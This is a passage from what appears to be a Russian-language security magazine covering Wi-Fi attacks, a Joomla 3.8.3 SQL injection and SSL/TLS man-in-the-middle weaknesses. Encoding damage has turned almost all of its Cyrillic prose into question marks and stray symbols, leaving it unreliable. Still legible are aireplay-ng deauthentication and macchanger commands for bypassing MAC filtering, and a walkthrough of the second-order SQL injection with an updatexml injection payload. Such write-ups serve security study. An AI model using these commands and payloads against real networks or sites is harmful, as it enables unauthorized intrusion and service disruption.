?????� ???�???�?� iw� reg� set� ?????� ????�???�???� ????�??.� ??� ????� ?????�
????� ?????� ?????�?????� ?� ????�????� ath9k� htc� ?� ?????� Qualcomm� Atheros
AR9271.� ??� ???,� ?� ???�???�?,� ???�???�??�?� ??????� AWUS036NHA.� ????�???�
?????�????��??�???�???�?????,�???�?????��??�??�???�???燣inux.
INFO
???�???�?� wireless� regdb� ???�???�?� ?� ???�?
db.txt�???�?�???�?.��??�?�??�???�???�??
?��???�??�??�????�??�??�?????,�?�?�???�
??� ????????�?.� ????� ????� ???�?????� 36� ???,� ??
???�??� ??� ????,� ???� ????� ?????� ??� ???�?� ???�??
????�????�??.� ????�???�??� USB?????�????
??�?????�???��?��??�????�??�?�???�????�
??????� ????�???�??.� ????�?????� ?????�????
???�????�??????�?�?�??????.
???�?� ???�???�??� ???�????� ???�?� ?????�?� ????????�??� ?????�???� ???�?
??� AP� ?� ??????�?????�?� ???????�?????�??� ???�??�??�??� ?� ???� ???�????.
?� ???�???� ????� ??� ???????� ???�?� ???�???� ???�??�?� 20� ???�??� ?� ???� ????�
??????� ???�?.� ???� ???�???�??� ???�????� ???????�???� ??� ???�???� ????�?
??�??�??�????�?燿eauth.�???�??�???�??�????�??�??���?��??,�?
???�???�???�??�????�????�?�??�????��??�??�??�???�?�?????�?�????
????�?�????.
??�?????�??�??�??�???�?
??�?� ??????� ???�??�??,� ??� ??� ???�??� ?????�???� ??� ???� ??� ????�???.� ???�?
???�????� ????�???� ???� ??� ???????� (??.� ??????� �???� ??� GPU�)� ???� ?
????????????�????�????�??�???.
???�??�?????�燛DPR
???�??�?�??�???�?��??�???��???�?
???�?�???�????�??�?????�?�????�????�??�?????� .cap�爃ashcat�� ????�
????�??�??�??�.pcap.�??�???�?????�.cap��.pcap�??�?��??????爐shark:
tshark -F libpcap -w <pcap_file_name> -r <cap_file_name>
??�??� ??� ??????� ?� ????�?� Wi?Fi� ??� ????�??�?,� ??� ?????�???� ????�??????
???�?��???�????�?????�?�(?�?????�??��??�????�?�????�????).�??�?
????????� ????�??� ???�??�???� ???�?� ???� ????�??� ????�???� ?� (????????�?)
????�??� ????�???�??,� ?� ?????� ???�?� ??????�?� ?� ??????�???� ???�????� ??
???????�????.� ?� ????� ?????� ???� ???� ??� ???�????� ?� ???� ????� ???�??� ???
?� make/install� ?� ????�??� ???�??.� ????� ????� ?????�?� ???�??????????�?,� ?
??????????� ????????� ?� ?????� ????� ?????,� ?� ???�??� ???�?� ????�?� ????�??
?�????�?�??�???�??燢ali.
??????�????�??????�????
???� ???�??�??�??� ????� (SSID� ???� ESSID)� ????�?� ???�????�?� ????�???
???� ??� ??????.� ???�???�???�?,� ???� ????�???�?� ?????�?� ?� ?????� ????�???
???�??�???�?� ?� AP� ?????�?� ?????�???�?:� ????� ????� ??� ???�?,� ???�??� ??
??�??�???.�???�?�?????燬SID�?????�?�???�?:�??�??????�??�??�???�?
????�??�???�?��???.
???�??� ???�??� ???�???�?� ?� �?????�????粻 ???� ????� (SSID),� ??� ???�????
????�?????�??� (BSSID,� ????�?� ???�???�?� ?� MAC� AP)� ?� ????� MAC??????.
?????�?� ???�?� ????�?????�??� ???????� ??????�???�?� ???� ????�????� SSID
????�??�????.�???�???�??�????�?????�??�????�??�??�??�????�??????�
????� ???�???� ?� ???�?????� ???�?� ???�???,� ??� ??� ???�?� ????�?� ??� ???.� ????�
?????�?�???????�???�??�??�????�?��????�???.
airodump-ng wlan1
???�?????�???�?,�??�???�????�???�???�???�??爓lan1,�??�??�????�??
???�???�?,��??�?�????�????��????�?????�?.�???�??�??,�?�???�?
??????�??�(ifconfig爓lan1燿own),�燼irodump?ng�??�?????�??�??�爉oni?
tor爉ode.
?????�??�???�?�???�??????�?�??�?,�????�?�????�???�??�??�???.
?????�?� ???�??� ????� ???�?????� ?� ?????�??� ?� ???� ??????�???�???�??
?????�?� ????�?????�??,� ???�????� ????� ???�????� ???�?????� AP� ??????� ????�
???�???�?��???�?????�?燬SID�?�???�???.
aireplay-ng -0 � -a D8:FE:E3:XX:XX:XX wlan1
????�????�??�?�????�???�???�??????燿eauth�???�??�????�??�?�???�
????� ?� MAC?????�??� D8:FE:E3:?� ???� ?????� (?????� ????�?,� ???� ????�?,� ?????�
???,� ???�????�??� ???????�?).� ??????�??� ??� ???�????� ????� ?????.� ???�???�?
???�?��???????�???燼irodump?ng�????�???�??�???.�???�??�???�????�
??,�???�?�??�?�???�???????�??�??�?�(?�??�??�??�???��????�???�
?????).
???�??�???�?燬SID�???�??�???
???????�?????????�?燤AC-??????
??�??�?????�?�???�?�??�???�????�???�?�??�??�??�??�?????�??,�???�
?????� ???�??�???�?� ????�?� ?????�??� c� ????�????�???� MAC?????�???.
?� ??????� ????�??�??� ??� MAC� ???�?� ???�???� ????�??� ?� ????�???�??� ????�
?????�??�?????�????,�???�???�?�??�??????�??�??�?????.
??�???� ???� ???�?� ???�??:� ????� ???�??�???� ??????�???� ?????�?????
?� ???�?????� ???�??� ???�???,� ???�??,� ???� ?????�??????�?� ????� ?� ??� �????
????�?�.�???�???�??�???�??�????��??????燗P��???�????�??�(?????�?
??????�?????��???)燤AC??????�??�??�???�???燱i?Fi.�??�?�?????�???�
???�???�?� ????�?� ???????�???� ?????�?,� ?????�?� ????�?????�??� ???�?
?????�???�????�???�?��??�??�???�??�?????��?????�???�?�?�??�???
???�??.�??�??�??�??�????�?????�?�?燗P�?�??�???�???.
1.�??�???�?�??�????�???�???,�??�???�?�??燤AC??????��?????�??
?�????�?????�?�(??.�??�??�????�?????).
2.�??�???�???:
airodump-ng wlan1
?�??�???�????�???�?????�?�??�?�??�???�燤AC?????�?�??�??�??�??
?�??�??�????�(??.�???�??牜STATION粻???�????�??�??燗P).
??�???燤AC?????�?�??�????
3.�???�??????�???�?�?�??�?�??�???�???燤AC??????.
macchanger --mac=64:DB:43:XX:XX:XX wlan1
4.�?�??�???�???�???�???�?????�???�?????�??.
aireplay-ng -0 � -a D8:FE:E3:XX:XX:XX wlan1
5.�??�??�???�?�??�??�???�????,�??�???�?�??�?????�??�??�???�??�?
??燗P.
??????
???� ?????�????� ?????�???�???� ???�????� ???�??�??�??� ?????� ???�???� ?????�
??????� ???�??????� ????� USB?????�????� Wi?Fi� ?� ???�?????�?� ??????
?�?????�???�?.�??�??�???�???�?�???�??�?????�??�?????�??�???�??
?�???????�??�????�??????�???,�??�????�??�????爐xpower.
????�??�??�??�??�??�??�???��???�??�??�??�????�?燤AC?????�??
???�?�??�???�??�?�?�???�?.燬SID��??�??????�???�?�?牜??????�????�
??粻 ???�?� ??????,� ????�?� ???�??????� ???�??�???� ???�???�?� ???� ???�?
?????�??�??�?�???�?????�??.
?????
????????
??牜??????�
??????�????????
SQL?????????
???????�??????
??�??????
??????????�燡OOMLA
aLLy
ONsec
@iamsecurity
Joomla��??�??�?�??????�????�??�???�??????�??�???�
????�??�?燱ordPress.�??�??????,��??????�?�?????�??
?� ????� ??????,� ???�???�?� ???�????�?� ???� ???�??� ????�??
?????�??�????�??�???�???�??�???�??�燙MS�?�?????�
????�?????�?,�?�?????�?�?�????�????�???�???�??.
????�???� ???�?????�?� ???� ?????�??�???� ???�??� Joomla� ??????� ??� 3.8.3.
?� ???????� ????�??� ?????�???�???� ??� ???�????� RIPS� Technologies.� ????�
???????� ??????�?� ????�?????�??� CVE?2018?6376.� ?� ???�??� 3.8.4� ???� ????
??????�???�??�????�?????燙MS,��??�???�???�?��???�?�?��???�?.
???�??�??�??�?????� ???�??????� ???�?,� ????�??� ???�???�????� ??????�
????��??�???�??�???.�??�??�?????�?�???�??�??,��??�??�????�???�
?????�??�?????�???��??�???�??�????爏econd爋rder燬QL.
?????
???� ???�?????�??� ???�??�??� ???�??� ?????� ???????� ?????.� ??????�???,
?燡oomla�???�??�????�??�?????�????�?�??�?燚ocker燞ub,�??�?�?????
???�?�??�??�?????�??�??燙MS.�?�?????�?????�?��?�???��??�?????�
??�???�??�??�??,�??�???�?�???�???�??�??�?�??�???�???�????�???.
???�???�????�???�??�??�??�燚ebian�
docker run -ti -p80:80 --rm --name=joomlavh --hostname=joomlavh debian /bin/bash
???�??�??�???�??????:燤ySQL,燗pache�燩HP�0.
apt-get update && apt-get install -y mysql-server apache2 php php7.0-xml php7.0-mysqli nano wget
??�???�???燙MS.�??�??�?�??�??�8.3.
cd /var/www/html/
wget https://downloads.joomla.org/cms/joomla3/3-8-3/Joomla_3-8-3-Stable-Full_Package.tar.gz?format=gz
tar xzf Joomla*
chown -R www-data:www-data .
?�??�?????:�???�???�??�??�??�???��??�???�???�??�??�??�??????
????�??�?�??�???�??.
service mysql start && service apache2 start
mysql -u root -e "CREATE DATABASE joomla; GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' IDENTIFIED BY 'megapass';"
???�?�??�?�???�?????�????�?�?�??�????�????�??????�??��???�?????
CMS.
??�????�?燡oomla�8.3
???�??�???�??��??�???燤anager,�????�???�????�??�???????�??�??�?.
?????????�?�?????????
??� ????�?� ???�????�?� ???�?� ??????,� ???� ??????� ????�???� ?� ?� ??????�???
???�???�??� ?????� ???????�??� ?� ???????�???�??� ????�???�?� ???�???�?
Hathor�(Hathor爌ostinstall爉essage).
?????�??�????�?�燚eveloper燦etwork
Hathor� ?� ???� ???�????� ????�?� ??� ???�??�????�?????� ??????????�????
????�??�??�??�??�?????,��??????�??�????�???燡oomla.
???�???�?�??�????�?????�???�??�??�???�??�燡oomla
??�???�????�?????�???�?�??�????爄sis�(??�??�??�??�??:�?�??�??��????
??????�??�?,��?�??�????�??��?�???�???�??),�?�???�?????�?�???�
??????�???�??�?????�??��??�???�??�??�???.�??????�?�??�???�??�?
??�???�?
/administrator/index.php?option=com_admin&view=profile&layout=edit
???�???�?�??�???�?????�?�???�?????�?
??�???�??�???�??�?�?????�?��??�?�??????�??.�?�??�??????�??????�
???�??�?,�??�???�?,�???��??�???,�??????�???�?�???�???.
???�??��??�??�??燬QLi
???�?????,�??�???�?????�??�?????��???爃athormessage.php.
/administrator/templates/hathor/postinstall/hathormessage.php
19: function hathormessage_postinstall_condition()
20: {
...
22:     $user          = JFactory::getUser();
...
39:     // Get the current user admin style
40:     $adminstyle = $user->getParam('admin_style', '');
41:
42:     if ($adminstyle != '')
43:     {
44:         $query = $db->getQuery(true)
45:             ->select('template')
46:             ->from($db->quoteName('#__template_styles'))
47:             ->where($db->quoteName('id') . ' = ' . $adminstyle[0])
48:             ->where($db->quoteName('client_id') . ' = 1');
...
50:         // Get the template name associated to the admin style
51:         $template = $db->setquery($query)->loadResult();
???�?� ???�?� ???????�??� $adminstyle� ???�????�?� ?� int,� ???�??,� ???� ???
?� ???�?.� ????�?� 40� ???????� ???� ?� ???,� ???� ???�????� ???????�??� ?
???�?????�??�?????�?????爂etParam�?�???�?燯ser.
/libraries/src/User/User.php
024: class User extends \JObject
025: {
...
318:     public function getParam($key, $default = null)
319:     {
320:         return $this->_params->get($key, $default);
321:     }
??�????�?�($this?>_params)�?????�?�???�?????�?��??�????�???�????�
??燫egistry.
/libraries/src/User/User.php
233:     public function __construct($identifier = 0, UserWrapper $userHelper = null)
234:     {
...
242:         // Create the user parameters object
243:         $this->_params = new Registry;
???� ???�????�????� ????�?????�?,� ???�??????� ???�??� ???�???� ?� ???�??
??????�???�?� ?� ????�???????�??�?� ???�???�???� ???�??� ??????�?� ?� ???
???????�??.� ?� ???� ???�?� ?� ???�??� ???� admin_styles.� ???� ????�???� ????
??????�??�??�????.�???��??�????,�??�??????�?�????�?????�??�???�
????�?????�?�??�?.
??�??� ????�??� ????�??� ?� ???�????� ???�??� ???�???.� ?� ???�??�??
??????� ?????� ????�??� ?� ???�???�?� jform[params][admin_style].� ???� ???� ?
???�??�?????�?�??�??�??�???�??�???,�?�????�???�??????�??�?????�
??.
??�??�????�????�?��???�??燼dmin_style�?�??�???�?�???�????�??�
????�???�?????�?
??�???� ??????�??� ??� ????�??� ????�???� ???�????�??� ??????� ?� ???�???�?
????�?燬QL????�????�?.
????�?燬QL��?????�??????�??燡oomla
???�????�?????????�???�?????�??:
0燼nd爑pdatexml(0x3a,燾oncat(1,�(select爑ser())),�#
??�?????燬QL????�????�燡oomla�8.3
???�燬QL????�????�???爏econd爋rder!
??�???�??�??�??�??�??�???�?????�???��???�??�??��???�???�???
admin_styles� ??????� ????�?????�?,� ?� ?????� ???� ???�??� ?� ?????� ????
??????�?� ?� ???�??� ?????�?� ??� ???�???.� ???�?????� ?� ?????� ???�????�??
??????�???????,�??�????,�?�??�?�??�????�????燘urp燬uite.
??�???�??�??�??�??��???�??�??
??�???� ???�????�?,� ???� ????�???�?� ???� ????�????.� ???�????� ?� ?????�???
????�?????�?�??�???�?.��???�?????�???�???�??�??爉essage.
/administrator/templates/isis/index.php
300:                 <div class="span12">
...
302:                     <jdoc:include type="message" />
??�??�??�?????�???�?�??�?????�??�??�????�??,�???�????�?�????�
???��???�??�?�??????�????�?????�??�???�?.
??�???燚OM????�????,�??????�???�???�?�???�????��?????
???????�??
/administrator/templates/isis/html/layouts/joomla/system/message.php
12: $msgList = $displayData['msgList'];
...
17:     <?php if (is_array($msgList) && $msgList) : ?>
18:         <?php foreach ($msgList as $type => $msgs) : ?>
19:             <div class="alert <?php echo isset($alert[$type]) ? $alert[$type] : 'alert-' . $type; ?>">
...
20:                 <button type="button" class="close" data-dismiss="alert">&times;</button>
21:                 <?php if (!empty($msgs)) : ?>
22:                     <h4 class="alert-heading"><?php echo JText::_($type); ?></h4>
23:                     <?php foreach ($msgs as $msg) : ?>
24:                         <div class="alert-message"><?php echo $msg; ?></div>
25:                     <?php endforeach; ?>
26:                 <?php endif; ?>
???�??�???�????�????�?�?�??�??�?� msgList�??�???�$displayData.�???
???�??� ?????�???�?� ???� ??????� ??????� render� ????�?� MessageRenderer,
???????,� ???� ???�???� ??� ???�????,� ????�???� ??� ???�?????�??� HTML?????
???�??�???�??�?�?????�???�?????�?.
/libraries/src/Document/Renderer/Html/MessageRenderer.php
22: class MessageRenderer extends DocumentRenderer
23: {
...
35:     public function render($name, $params = array(), $content = null)
36:     {
37:         $msgList     = $this->getData();
38:         $displayData = array(
39:             'msgList' => $msgList,
40:             'name'    => $name,
41:             'params'  => $params,
42:             'content' => $content,
43:         );
...
60:         return LayoutHelper::render('joomla.system.message', $displayData);
???�??�??�?????�???�????�??�??�???�????爂etData.
/libraries/src/Document/Renderer/Html/MessageRenderer.php
70:     private function getData()
71:     {
72:         // Initialise variables.
73:         $lists = array();
74:
75:         // Get the message queue
76:         $messages = \JFactory::getApplication()->getMessageQueue();
77:
78:         // Build the sorted message list
79:         if (is_array($messages) && !empty($messages))
80:         {
81:             foreach ($messages as $msg)
82:             {
83:                 if (isset($msg['type']) && isset($msg['message']))
84:                 {
85:                     $lists[$msg['type']][] = $msg['message'];
86:                 }
87:             }
88:         }
89:
90:         return $lists;
91:     }
??�???�??� ?????�?� ??� ???�???,� ???????� CMS� ????�???� ???�?????
?�??????�?????爂etMessageQueue.
/libraries/src/Application/CMSApplication.php
465:     public function getMessageQueue($clear = false)
466:     {
467:         // For empty queue, if messages exists in the session, enqueue them.
468:         if (!$this->_messageQueue)
469:         {
470:             $session = \JFactory::getSession();
471:             $sessionQueue = $session->get('application.queue', array());
472:
473:             if ($sessionQueue)
474:             {
475:                 $this->_messageQueue = $sessionQueue;
476:                 $session->set('application.queue', array());
477:             }
478:         }
479:
480:         $messageQueue = $this->_messageQueue;
481:
482:         if ($clear)
483:         {
484:             $this->_messageQueue = array();
485:         }
486:
487:         return $messageQueue;
488:     }
??�??�????� ?� ???�???� ???�???�??�?� ??� ???�??� ????�???� ????� ??� ???�?
?????�????.� ???�??� ???� ????�???�?� ??????� com_cpanel.� ??,� ????�???�?,
?�???�???�?�?????��???�??�??�??�??�??????��?????�???�??�?????�
?????�?????燿isplay�?�?????�?�??�???�???燙MS.
/libraries/src/MVC/Controller/BaseController.php
614:     public function display($cachable = false, $urlparams = array())
615:     {
...
621:         $view = $this->getView($viewName, $viewType, '', array('base_path' => $this->basePath, 'layout' => $viewLayout));
...
672:             $view->display();
????�????�??�???�?�?�???�??�????�??,�??????�?????�???�?��??�??
??????,��????�???�????燿isplay�??��?�??�??�??.
/administrator/components/com_cpanel/views/cpanel/view.html.php
17: class CpanelViewCpanel extends JViewLegacy
18: {
...
33:     public function display($tpl = null)
34:     {
????�?�??�????�?� com_cpanel�???�????�?�???�????,�??�???�???�???�
??�???�??�?.
/administrator/components/com_cpanel/views/cpanel/view.html.php
50:         try
51:         {
52:             $messages_model = FOFModel::getTmpInstance('Messages', 'PostinstallModel')->eid(700);
53:             $messages       = $messages_model->getItemList();
54:         }
55:         catch (RuntimeException $e)
56:         {
57:             $messages = array();
58:
59:             // Still render the error message from the Exception object
60:             JFactory::getApplication()->enqueueMessage($e->getMessage(), 'error');
61:         }
62:
63:         $this->postinstall_message_count = count($messages);
??�???�??� ??????�???� ???� ??????� ????�???�?� FOF� (FrameworkOnFrame?
work).� ???�???� ???� ??????�?� ?????�???� ????�?� PostinstallModelMessages
??� ??????� com_postinstall,� ?� ?????,� ???� ??????� ??????� getItemList,
?????�???�?� ?????� ??????� buildQuery� ???� ?????�???�???�?� ?� ???�??�??
??????� PostinstallModelMessages.� ????� ?????� ???�???�?� SQL????�??
???�????�?�???�????�?�??�???.
/libraries/fof/model/model.php
1215:     public function &getItemList($overrideLimits = false, $group = '')
1216:     {
1217:         if (empty($this->list))
1218:         {
1219:             $query = $this->buildQuery($overrideLimits);
/administrator/components/com_postinstall/models/messages.php
17: class PostinstallModelMessages extends FOFModel
18: {
...
28:     public function buildQuery($overrideLimits = false)
29:     {
30:         $query = parent::buildQuery($overrideLimits);
31:
32:         $db = $this->getDbo();
33:
34:         // Add a forced extension filtering to the list
35:         $eid = $this->getState('eid', 700);
36:         $query->where($db->qn('extension_id') . ' = ' . $db->q($eid));
37:
38:         // Force filter only enabled messages
39:         $published = $this->getState('published', 1, 'int');
40:         $query->where($db->qn('enabled') . ' = ' . $db->q($published));
41:
42:         return $query;
43:     }
??�??� ???????�??� ???�??� ?????�???�?� ?� ????�???� ?????�?� ??� ???�???
postinstall_messages.�??�??�??�??�????�??:
SELECT `#__postinstall_messages`.*
FROM `#__postinstall_messages`
WHERE `extension_id` = '700' AND `enabled` = '1'
???�?�?????�??�?????�????�????�?�????�???�?�????燺getList.
/libraries/fof/model/model.php
1225:                 $this->list = $this->_getList((string) $query, $limitstart, $limit, $group);
1226:             }
1227:             else
1228:             {
1229:                 $this->list = $this->_getList((string) $query, 0, 0, $group);
1230:             }
1231:         }
1232:
1233:         return $this->list;
????�?�???�??�???�??�????爋nProcessList.
/libraries/fof/model/model.php
1950:     protected function &_getList($query, $limitstart = 0, $limit = 0, $group = '')
1951:     {
1952:         $this->_db->setQuery($query, $limitstart, $limit);
1953:         $result = $this->_db->loadObjectList($group);
1954:
1955:         $this->onProcessList($result);
1956:
1957:         return $result;
1958:     }
??�??� onProcessList� ???�???�???� ??� ????� ???�??�??� ?� ????� ???�??�??
?�????�???�?�??�?,�??�??�???��???� condition_file,�??�???,�??????
???????�?��???燾ondition_method.
??�???�?�??�???爌ostinstall_messages.�??????�??�???�??�???�?
??�???��??�???,�??????�????�????�???
/administrator/components/com_postinstall/models/messages.php
124:     protected function onProcessList(&$resultArray)
125:     {
...
132:         foreach ($resultArray as $key => $item)
133:         {
134:             // Filter out messages based on dynamically loaded programmatic conditions.
135:             if (!empty($item->condition_file) && !empty($item->condition_method))
136:             {
137:                 jimport('joomla.filesystem.file');
138:
139:                 $file = FOFTemplateUtils::parsePath($item->condition_file, true);
140:
141:                 if (JFile::exists($file))
142:                 {
143:                     require_once $file;
144:
145:                     $result = call_user_func($item->condition_method);
???� ??� ?� ???�?????� ?� ????,� ?� ????� ??????,� ?� ??????� ???�????� ???�???
hathormessage_postinstall_condition.
????????????�?????????�(?????)
??????
?�??????�??燙MS�????�??�???�??????��????�??�???�???�?????.�??,
???�????,� ????� ????�???�?� ?� ???????� ???�????�???� ???�???� ????.� ????�
?????�????��??�?????�??�????�?�??�?�???�???�????�??�?��???�???�
?????,�?�??�???�?�???????,�??�??�?�??????.
??�?� ???�??????� ?????� ????� ??????�?????� ???� ??????�??� ???�???�??
?� ???�???� ?,� ???�????,� ???� ?????�????� ???�??� ?????�???�?????�?.� ???� ???
????��???�?????�???�??�???燡oomla,�?�?�??�?��???????�?.
?????
???????????
?????
?????????�?????????�???????
????????????燬SL�燭LS
?�???????????�????
???�???????�?�??�??????�??�??�??�???�
???,� SSL/TLS????�????� ???�?� ????� ?????�
??????� ??????�?� ????�?� ???� ????
???????�??�???????????�?????�??.�???�
???� ??� ??????�???�?� ???� ???�??�???� ?????�
???�??�???�??� ???�????�??� ?????�?????�
????,� ???�????�??� ?� ????�?,� ???� ??????�?
???�??�??� ???�??????� ??????�???� ??� ????�
?????�???�???�??�??�?????��??�??�??
???�??�????,� ?????� ???� PayPal� ?� Amazon,
???�
???????�?�
??????�??�
???�??
?� ????????� ???�???�?,� ???�??????
???????�?� ?� ???�??�??�??� ?� ?????�??????�
???� ???�????� ?� ??????�??� ???�???�???
iOS�燗ndroid.�??�?????,�??�??�???�???,
???�?� ?????� ????�?� ????�??�???�??
???????�???�
???�???�
???�?????�??
???????�????,� ??????�?� ???�???�??.
?�???�?????�?�??�???�??,�??�???????�
?????� ????� ???�?????�??� ????�?????�???
??�???�???.
?????�????
???????�?�?????????????
????????????.�??????????
??????,�????????????
�?????�?????????�
????????????�???????�,�
?????????�?????�???????
???�???????????.�??????
????????????????
?????????��??????????????
????????,�????????��????
??,�????????????
?????????.
vedacoder@mail.ru
??????�??�????
?� ??????,� ???????�??� SSL/TLS????�???�??� ?????�????� ???�??� ?????�
????????� ???�????�????�????,� ???�????�????� ?� ?????�?????� ???�?????�??
???�??�??�?� ?� ???�????�?� ???�?,� ????� ????� ?� ????� ???�??� ????????� ?????�
???????� ???�???�?????:� ???�?� ????� ???�?????� ???�?????� ???�??,� DNS
????????,� ?� ???�?� ???�???� ?� ???�??�???�???,� ???�?????�?� ?� Wi?Fi� ???�???�
????�???� ???�???�????�??,� ???????,� ??????� ???�?� ???�???,� ???�??�???�?
SSL/TLS???????.� ???�?� ????,� ???�?� ???�??�???� ????� ????�???� ???�??�???�?
?� ?????�???� ???�???,� ???�???�?????� ?????� ???�?????� ???????� ?????� ????�
????� (???�????,� ?????� ???????�??� DNS)� ?� ???????�?????� ???�??� ????�?
?????�???�??�???�?�???�??�???�??�??�??�??.
??�????�????� ???�?????�??� ?� ?????� ???????� ????�???,� ???� ?????�??,
???????� ???????� ??� ????�?????�?� ???�??�?� ????�????�????�???� ???�??????�
??,� ???�??�?????�???� ???�????� ???� ????�??�?� ?????�????.� ?� ???� ???�?
??� ????�?????�?� ?????�????� ??????� ???�??� (cipher� suite),� ??????�?� ???�??
?� ???�??� ????�???�?� ???� ????�?� ???�???.� ???� ????� ???�?� SSL/TLS???????�
?????�???�??�?????�??????�??,�??�??�???�???��??�?�??�???�??�??
???�???�?�???�???????�?��??,�??:
? ???�??????�????�??�???�???�???�??�??�?????�???
? ????�??�??�????�?�????�(???�??�??????�?�??�???�??)?
? ?� ????�?� ???????�?????� ?� ???�?????�?� ????� ???�???�??�?� ???� ?????,
?�?????�?�??�???�??�?�??�??�????.
??????????�??�?????:�???????�????????
??�???� ??� ???�??� ???�???�???� ?� ???�????�??,� ???� ???????� ???????�????
???�?????�??� ?????� ???�??�?,� ???�???�?� ???�??�?� SSL/TLS????�?????�?,
?�???燛V?SSL,� ???�?????�?��??�????�??�??�??�??,�??�?????�??�????�
??,�??�??�??�???�??�???�??�???�??????�??�??�???�????�??�??:燣in?
ux,燱indows,燗ndroid�爄OS.�??�?�??�?????�??�?,�??�?????�爉iddleware?
???�????�??�?�?�?????�??�?????:
? Amazon???????� Java????�????�?� EC2� ?� ???� ????????� ????�???????�???,
???�??�????�?�?�???�??
? Amazon???????� ?� PayPal???????� ???�????� SDK,� ??????�???�??� ??� ???�????
???�??�??� ???�??????� ??� ???�??� (??� ???????� ???�????�?� ??????????�???
??????????�?????)��??�??�??�??�???
? ??�????�????�??� �??�???�,� ?????� ???� osCommerce,� ZenCart,� Ubercart
?燩restaShop,�??????�?�??�???�?�??�?????�?�???�??
? AdMob????,� ??????�?????� ??????�??� ???�??� ???� ??????� ???�???�???
???�????
? ??�?????�???� ????�???????�????�?� ElephantDrive� ?� FilesAnywhere,
??????�???�??�?�??�??�??�????��???????�??�???�???
? Android????�??�????�?燩usher��???�???,�??????�?????�???燩usher燗PI
???� ???????�??� ????�??� ????�??�???� ????�???�??� (???�????,
GitHub???????燝aug.es)?
? Apache� HttpClient� (???�??� 3.x),� Apache� Libcloud� ?� ???� ???�??�???� ???�???�
?????��??�????燗pache燗ctiveMQ��????�???
? SOAP爉iddleware????�???燡ava,��??�??�?燗pache燗xis,燗xis�燙odehaus
XFire?� ?� ???�?� ????� ????,� ???????� ??� ????� ????� middleware????�????� ????�
???�??
? API????�??�??�?燛lastic燣oad燘alancing?
? Weberknecht??????�????燱ebSockets????
? ?�??�?�???�?????�??�???,�??�??�????�?�???�??????�?????�???
???�?????� ?� middleware????�????� (???�?� ??????,� ???� ?????� middleware?
???�???,� ????�?� ????�?)?� ?� ???� ???�?� iOS????�??� ???�???????�??�???
Rackspace.
???�????爉iddleware????�???
???�????,� ?????� ???????�???� ???� ????�?� ???�?� ???�????� ??????�??� ????�
????�??.� ?� ??� ???�?:� Android's Google Cloud Messaging, Angie's List Business
Center Passwords, AT&T Global Network Client, CapitalOne Spark Pay, Cisco OnPlus
(remote access), Cisco Technical Support, Cisco WebEx, Cisco WebEx Passwords,
Dominos Pizza, E-Trade, Freelancer, Google Earth, Huntington Mobile (Bank),
Intuit Tax Online Accountant, iTunes Connect, Microsoft Skype, Oracle Now,
Pinterest, SafeNet (VPN client), SouthWest Airlines, Uber, US Bank - Access
Online, Western Union, WordPress, Yahoo! Finance, Yahoo! Mail.
??�???�??�????�?�?�???�?�??�????�?????�??�??�???�??
??????????�?????????燬SL/TLS-?????????
SSL/TLS??????�????� ???�?� ???�?� ?� ???�???� ???�???� ???�?� ???�???
???�?????�?�???�??燤itM?????.�??�???燤itM????�?�??�?�??�??�?�?????�
???� ????� ???� ???�????� ???�?????�??� ?� ???� ??????�??� ???�??�??
???�??,� ??????�?� ???�???� ???�?????�?� ????� ???�?????�?.� MitM????�?
???�?� ???�??�?,� ????�?� ???�??�??�??� ???????�??� ???�????�?,� ???????� ????�
????�??�?��??�???�?�??�??�?燬SL/TLS????�?????�?�?�??�???�??�??�???�
??� ???�?.� ?� ??????�???� MitM????�???�?????� ?????,� ???�????,� ????????
??????� ????�???�??,� ??????� ???�??�??� ????,� ???�?,� ????�?� ?� ???�??� ?
?�?????�??�??�?,�??????�?????�???�??�????�??????�???�??�???�???�
??�??�????.
???�????�?� ??????�???� ???�?,� ???????� ?????� ??� ????�?� ?????????� Ad?
Mob� ???� ???�?� ???�?� ???�???�??� ?� AdMob?????�????,� ????� ???�???� ?� ???
???�???�?� ???�????�?� ???�???????� ????�??� ???�??� ?� ????????� ???�??
??�???�??燝oogle????�????.��??�???,�????�????�??�???�??�??�?�???�
??????�??� ?� ?????� ???�??�??�??,� ???� Trillian� ?� AIM,� MitM????�???�?????
?????�???????�???�??�??�??�??�??�?�?�???�??�????燝oogle�(????�??
Gmail),燳ahoo��??�?��??�????燱indows燣ive�(?�??�??�?燬kyDrive).�??�?
???�??� ???�????�??,� ??????�?� ????�???� ???�????�??� ???�?????�??
????????:� ??????�??????� ???�?????�??� ???????�??� ??????�??� ???� ?????�
?????�??�?�??�??�???�???�????�?????�????�??�??�?�??�??�???�?�???�
??????�??�??�??�??�??�???�??????�??�????�????�??�??�?.
??????�???????????????�?????????�?????????
SSL/TLS-?????????
??� ?� ?????�?� ??,� ????�?� ????????� ?� ???,� ???� ????� ????� ?� ?????�????
SSL/TLS????�???�?� ???� ???????�??� ???�??� (????,� ?????�?,� ??????� ?� ???
???� ?????),� ??� ??????� ???�?� ????�?,� ??�????� ???�??�??� ????,� ????�
?????� 0day????�??�??� ?� ?????� ?????,� ???� ???�????�?,� ???�??�?,� ???�????�
?????� ???�???,� ???�???� ?� ???�??�?,� ????�??�???�????� BGP????�??�????�
???� ????� ???�????� SSL/TLS� ??� ????�??�??� ?/???� ????�??�???� ????????
???????.
???�?�?燬SL�?�???�??�??�???????�??????
???�?�???,�??�???�????�?�????�????�???�???�????�?�?????�??燤itM?
???�?,� ???�???�?????� ???????�??� ??????�????� SSL/TLS?????�??,� ??????�
?????�??� ?� ????�?� SSLSessionCache.� ????� ????????� ???�???�?� ???�?????�
?????�??�?????�??�???�?�??�??�???????�??�????�????,��??�???�???�
???????� ???�???� ????�??� ????�???�???� ?????� ???�?� ???�?� ???�????� ????�
??????�??��?????�???.�??�?�???,�??�?�??????�????燗ndroid???????�???
(?????� ?????� �?????�???粻 ???� �????�???� ???????�)� ???�?� ???�??�???
??????� ?????�????�??� ???�??� ???�?� ???�???�??,� ???????� ???�?� ????????�
?????�?�????�?????,�?�?�??????�????�?????�?.�??,�??�????,�??�????�
???� ?� Google� Maps.� ?� ???�??�????� ?� Black� Hat� ???�???,� ???� ???�???�?� ????
??????�??� ??????�????� ???�???�?????� ?????� ?????�????� ????�????
???�???�?????�?�???�??�?????��??�???牜??????�??�??�?????�?粻?�????
????�??�?????�??????�????�????��????�??�???�???.
???�?????�???�??�?????�??�??????
???�?�??�??�??�??????�??�??�??�????�??�????�????燬SL/TLS????�????�
??� ???�?� ????�???� ???�????� ???�??????� (??.� ???�??�????� ?� Black� Hat
